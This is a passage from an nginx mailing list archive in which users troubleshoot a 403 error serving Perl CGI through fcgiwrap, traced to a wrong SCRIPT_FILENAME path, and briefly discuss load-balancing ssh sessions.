fastcgi_index index.php; > fastcgi_param SCRIPT_FILENAME > /srv/www/site.net.net/www$fastcgi_script_name; > } > > location ~ \.cgi$ { > try_files $uri =404; > gzip off; > include /etc/nginx/fastcgi_params; > fastcgi_pass unix:/var/run/fcgiwrap.socket; > fastcgi_index index.cgi; > fastcgi_param SCRIPT_FILENAME > /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name; > } > AFAIK, path before $fastcgi_script_name should not end with / Log didn't say anything in particular? error 403 where comes? 403 means forbidden, perhaps socket which your are running has not been started with same permissions as Nginx does/can. Running fcgi manually through that socket could bring you more clues about whats happening/wrong with the communication between Nginx and fcgi > } > > I've sym-linked the config files into sites-enabled, so that its visible on > nginx. I then rebooted nginx, and tried: > > index.html - works fine > index.php - works fine > index.cgi - 403 error > > I managed to fumble my way through it last time, but I can't figure out > what > I did different (I know it was a real pig to get configured the first time > around) > > Any suggestions from the experts? > > (appologies for the formatting of this post - can't figure out how to do > markup?) > > TIA > > Andy > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,260678,260678#msg-260678 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- ~ Happy install ! Erick. --- IRC : zerick Blog : http://zerick.me About : http://about.me/zerick Linux User ID : 549567 -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 31 18:55:02 2015 From: nginx-forum at nginx.us (youradds) Date: Fri, 31 Jul 2015 14:55:02 -0400 Subject: Perl + fcgi + nginx - what am I doing wrong? In-Reply-To: References: Message-ID: <697cd58870939011b5f7d175573d35a4.NginxMailingListEnglish@forum.nginx.org> Hi, Aaaaah now I feel like a total muppet! I had: fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/cgi-bin/$fastcgi_script_name; but it wasn't in the cgi-bin!!!!It should have been: fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/$fastcgi_script_name; Reboot it, and it works fine now., That'd be whyit was 403'ing... as it couldn't find the file. Duh! Thanks for sticking through this with me. I've been battling that for hours. Always so simple when you know the answer ;) Cheers Andy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260687#msg-260687 From nginx-forum at nginx.us Fri Jul 31 18:59:34 2015 From: nginx-forum at nginx.us (youradds) Date: Fri, 31 Jul 2015 14:59:34 -0400 Subject: Perl + fcgi + nginx - what am I doing wrong? In-Reply-To: References: Message-ID: haha yup - that was it! Just tweaked the config for it, and it works perfectly. Still got some fun and games to do with the modules that need installing- but at least I can finally access it from the browser, to test it all. Thanks again! Andy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260688#msg-260688 From maxim at nginx.com Fri Jul 31 19:27:07 2015 From: maxim at nginx.com (Maxim Konovalov) Date: Fri, 31 Jul 2015 22:27:07 +0300 Subject: ssh load-balancing In-Reply-To: References: Message-ID: <55BBCC0B.7080607@nginx.com> On 7/31/15 8:05 PM, Jerry Wyman wrote: > Hi, > > I?m new to nginx and am trying to load-balance ssh sessions to an > autoscaling group of ECS instances in AWS. > [...] Just curious: is it just a test or a real use-case? Why does anybody want to load-balance ssh? -- Maxim Konovalov http://nginx.com From francis at daoine.org Fri Jul 31 22:23:24 2015 From: francis at daoine.org (Francis Daly) Date: Fri, 31 Jul 2015 23:23:24 +0100 Subject: Perl + fcgi + nginx - what am I doing wrong? In-Reply-To: <697cd58870939011b5f7d175573d35a4.NginxMailingListEnglish@forum.nginx.org> References: <697cd58870939011b5f7d175573d35a4.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150731222324.GC23844@daoine.org> On Fri, Jul 31, 2015 at 02:55:02PM -0400, youradds wrote: Hi there, Good that you found and fixed the problem. > I had: > > fastcgi_param SCRIPT_FILENAME > /srv/www/site.net/www/cgi-bin/$fastcgi_script_name; > > but it wasn't in the cgi-bin!!!!It should have been: > > fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/$fastcgi_script_name; > > Reboot it, and it works fine now., That'd be whyit was 403'ing... as it > couldn't find the file. Duh! Note, you have try_files $uri =404; fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name; The first line says "return 404 unless the file $document_root$uri exists". In general, if the second line does not also refer to exactly the filename $document_root$uri, you should suspect a problem. (It can validly refer to a different filename, but probably only where the fastcgi server is inside a chroot area.) When you come to use the cgi-bin directory, you'll want to be aware of that. Cheers, f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Fri Jul 31 22:30:06 2015 From: nginx-forum at nginx.us (jerrywyman) Date: Fri, 31 Jul 2015 18:30:06 -0400 Subject: ssh load-balancing In-Reply-To: <20150731175329.GG19190@mdounin.ru> References: <20150731175329.GG19190@mdounin.ru> Message-ID: Thanks Maxim, I'll give that a try. Much appreciated, Jerry Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260683,260691#msg-260691